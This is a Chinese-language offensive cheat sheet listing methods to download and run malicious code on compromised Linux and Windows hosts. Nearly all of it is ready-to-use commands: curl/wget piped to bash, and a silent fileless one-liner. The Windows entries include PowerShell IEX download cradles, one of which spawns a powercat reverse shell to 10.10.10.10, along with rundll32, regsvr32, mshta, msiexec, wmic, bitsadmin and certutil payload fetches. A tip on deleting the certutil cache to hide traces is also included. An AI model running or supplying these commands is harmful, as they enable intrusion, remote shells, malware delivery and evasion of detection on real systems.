Download Malicious Code

在滲透過程中,攻擊者往往需要透過指令下載執行惡意程式碼,實現資訊收集、持久化、權限提升、防禦繞過、提取憑證、橫向移動、資料滲出等操作。以下總結Linux和Windows中下載和執行惡意程式碼的常見方法。


Linux

1.curl

以curl的方式執行http頁面上的shell腳本,無需download,在本機上直接執行。

方式1:curl http://10.10.10.10/test.sh | bash

方式2:bash < <( curl http://10.10.10.10/test.sh)


2.wget

執行wget命令遠端下載惡意程式。

方式1:wget -q -O- http://10.10.10.10/test.sh | bash

方式2:wget http://10.10.10.10/shell.txt -O /tmp/x.php && php /tmp/x.php

方式3:curl+wget合併,實現無檔案遠端惡意程式碼執行。

bash -c '(curl -fsSL http://10.10.10.10/test.sh||wget -q -O- http://10.10.10.10/test.sh)|bash -sh >/dev/null 2>&1&'


3.rcp

rcp指令用於複製遠端檔案或目錄。

rcp root@x.x.x.x:./testfile testfile


4.scp

scp 是rcp 的加強版,scp是加密的,rcp是不加密的。

scp username@servername:/path/filename /tmp/local_destination


5.rsync

使用rsync可以進行遠端同步,拉取檔案到本機伺服器。

rsync -av 10.10.10.10 :/tmp/passwd.txt /tmp/passwd.txt


6.sftp

使用sftp下載遠端伺服器上的檔案。

sftp admin@10.10.10.10 <<EOF  
get  /tmp/2.txt            
quit 
EOF


Windows

1.Powershell

利用powershell遠端執行ps1腳本。

powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.10.10/powercat.ps1');powercat -c 10.10.10.10 -p 6666 -e cmd

powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.10.10/evil.txt'))"


2.rundll32

使用rundll32.exe,可以透過mshtml.dll執行JavaScript ,依賴WScript.shell這個元件

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://10.10.10.10/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

3.regsvr32

遠端載入執行,解析.src檔。

regsvr32.exe /u /n /s /i:http://10.10.10.10/file.sct scrobj.dll


4.wmic

執行WMIC以下命令從遠端伺服器下載並執行惡意XSL檔案:

wmic os get /FORMAT:"http://10.10.10.10/evil.xsl"


5.msiexec

用於安裝Windows Installer安裝包,可遠端執行msi檔案。

msiexec /q /i http://10.10.10.10/evil.msi


6.IEExec

IEexec.exe應用程式是.NET Framework附帶程序,執行IEExec.exe並使用url啟動其他程式。

crosoft.NET\Framework64\v2.0.50727>caspol.exe -s off C:\Windows\Microsoft.NET\Framework64\v2.0.50727>IEExec.exe http://10.10.10.10/evil.exe


7.mshta

mshta用於執行.hta文件

mshta http://10.10.10.10/run.hta


8.msxsl

msxsl.exe是微軟用來命令列下處理XSL的程式

msxsl http://10.10.10.10/scripts/demo.xml http://10.10.10.10/scripts/exec.xsl


9.pubprn.vbs

在Windows 7以上版本存在一個名為pubprn.vbs的微軟已簽署WSH腳本,可以利用來解析.sct腳本:

cscript pubprn.vbs 127.0.0.1 script:https://10.10.10.10/file.sct


10.Bitsadmin

利用bitsadmin指令下載檔案到目標機。

bitsadmin /transfer n http://10.10.10.10/imag/evil.bat d:\test\1.bat


11.certutil

用於備份憑證服務,一般建議下載完檔案後對快取進行刪除。

下载文件 certutil -urlcache -split -f http://10.10.10.10/imag/evil.txt test.php

删除缓存 certutil -urlcache -split -f http://10.10.10.10/imag/evil.txt delete


refer:
https://www.cnblogs.com/xiaozi/p/13534602.html